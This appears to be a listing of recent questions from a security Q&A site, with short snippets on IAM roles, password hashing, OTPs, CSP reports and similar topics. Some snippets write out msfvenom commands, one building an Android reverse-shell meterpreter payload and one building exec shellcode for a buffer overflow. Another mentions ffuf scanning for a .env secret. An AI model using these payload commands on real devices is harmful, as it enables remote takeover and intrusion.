Newest Questions
70,166 questions
0
votes
0
answers
42
views
hypothetical copy/paste code exploit from stackexchange or llm code copy blocks [closed]
is it possible to insert hidden code using utf8 or utf16 that rearranges a sequence of executable ascii letters (first a utf16 character that rearranges the letters off-screen could be interpreted as ...
0
votes
0
answers
25
views
How to properly assume an AWS IAM Role in an automated way from server sitting outside of cloud?
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
1
vote
0
answers
28
views
Android msfvenom payload [closed]
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
0
votes
1
answer
45
views
MsfVenom generated shellcode fails when using it in buffer overflow
I use msfvenom generated shellcode in buffer overflow.
Here's command that i used to create shellcode for linux x64:
msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami
and here's ...
0
votes
1
answer
40
views
How to find out if CSP report is XSS vulnerability or malicious browser extension?
I have recently added CSP headers to a rather complex web application, being -report-only at first.
I got some noise from browser extensions in the report, but two incidents caught my eye especially:
...
1
vote
0
answers
30
views
Can a SIM card have malware and how can it spread? [duplicate]
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also?
I saw that it can attack during a phone update download. If the update has downloaded ...
1
vote
0
answers
71
views
GPU speedup for PBKDF2 vs bcrypt vs Argon2
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
1
vote
0
answers
77
views
VPN client on a router versus VPN client on a computer
Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
0
votes
0
answers
57
views
Wikipedia certificate unexpectedly from Google [closed]
Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean?
I know there are some similar ...
0
votes
0
answers
13
views
What is this path added by /etc/paths.d/10-pmk-global on macOS? [migrated]
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global.
Usually, a system-related program would go in /...
0
votes
0
answers
24
views
How secure is the package lm-sensors? [closed]
I want to know how much secure is the package lm-sensors.
I need to monitor the temperature of my machine to adapt the configuration of the fans.
The programm prompt me for my root password to access ...
0
votes
0
answers
26
views
Seeking Advice on Transitioning to a Cybersecurity Career after 3 Years as a Full-Stack Developer [closed]
i wanna your advice for
cyberSecurity career i've been 3 years experience as fullstack developer
and i thing i gave some love to all things realated with DevOps and linux an cyberSecurity , so i ...
0
votes
0
answers
24
views
Insights required on my naive aproach to audit Firefox extensions [closed]
I tried to search the web on existing projects, but after failed attempts, I decided to code something on my own way, one approach, open to comments and improvements:
#!/usr/bin/env python3
import ...
0
votes
0
answers
34
views
Possible web form injection from ad triggering biometric prompt
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
0
votes
1
answer
91
views
Is C#'s System.Web.Helpers.Crypto password-hashing still considered secure?
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
0
votes
0
answers
20
views
Late 2025/2026 equivalent of ExtAnalysis to audit Firefox extensions? [closed]
I discovered ExtAnalysis, tried to run it in a Docker container, but this seems that this project is abandoned.
There's too many errors. Some issues are opened since 2023 in the repository.
So my ...
-1
votes
0
answers
48
views
Why do money transactions stop during the change of clock due to daylight saving time? [closed]
During the change of clock due to the daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour ahead of the time of change if the clock. Why do they ...
0
votes
0
answers
18
views
using ffuf with wordfile but it is not finding .env [closed]
I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret.
The secret is on a file called .env (I found it in a different way), but I wonder why ...
0
votes
1
answer
200
views
File backup encryption for personal files
I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
5
votes
1
answer
812
views
Can you bypass PIN requirement of FIDO token protected LUKS device with hex editor?
I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
6
votes
1
answer
612
views
What is the difference between contactless Apple Pay and contactless card?
Apple claims that one time token is created. What is the purpose of that token? What happens with that token?
As far as I know when I pay with my physical debit card the information passed the POS ...
0
votes
1
answer
40
views
PCI applicability when only typing cc info into a client's payment system
My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future.
One potential client has us using their ...
7
votes
3
answers
2k
views
Does an SMS OTP have to be recreated for every message?
I use SMS for MFA (yes I know it's bad, but better than no MFA) in an web application.
On login an OTP is sent to the user via SMS.
This OTP is valid until:
it expires after 10 minutes
it is ...
0
votes
0
answers
21
views
Why is the raw log data parsed by Defender different from what is shown in the Defender console?
How does Defender for Cloud interpret and normalize these logs?
In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP.
...
0
votes
1
answer
62
views
Does qualified electronic signature require a certified middleware
When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform?
Does ...
1
vote
0
answers
46
views
How can I restrict IFEO vulnerability?
I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for a attacker.
Only someone having access to Windows registry can ...
0
votes
0
answers
56
views
What is the appropriate incident-response procedure after a user clicks a phishing link without entering credentials? [duplicate]
A user accidentally clicked a link in a phishing email.
The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
0
votes
1
answer
97
views
How I can ensure that I have enough entropy in a base64 encoded byte string?
In php I am generating a unique random token used as a code and Index for password resets:
declare(strict_types=1);
namespace App\Domain\Helper;
use Ramsey\Uuid\Uuid;
use Random\RandomException;
...
0
votes
0
answers
4
views
How to analyse Android mobile memory? [migrated]
Is there any method to forensically analyse Android mobile memory without rooting the phone. I want to capture malware in my Android phone.
0
votes
3
answers
98
views
Generating OTP used in SMS and email
I am using the following approach for time limited OTP used in my php app using a pseudorandom generator:
$otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT);
Then upon the User I store:...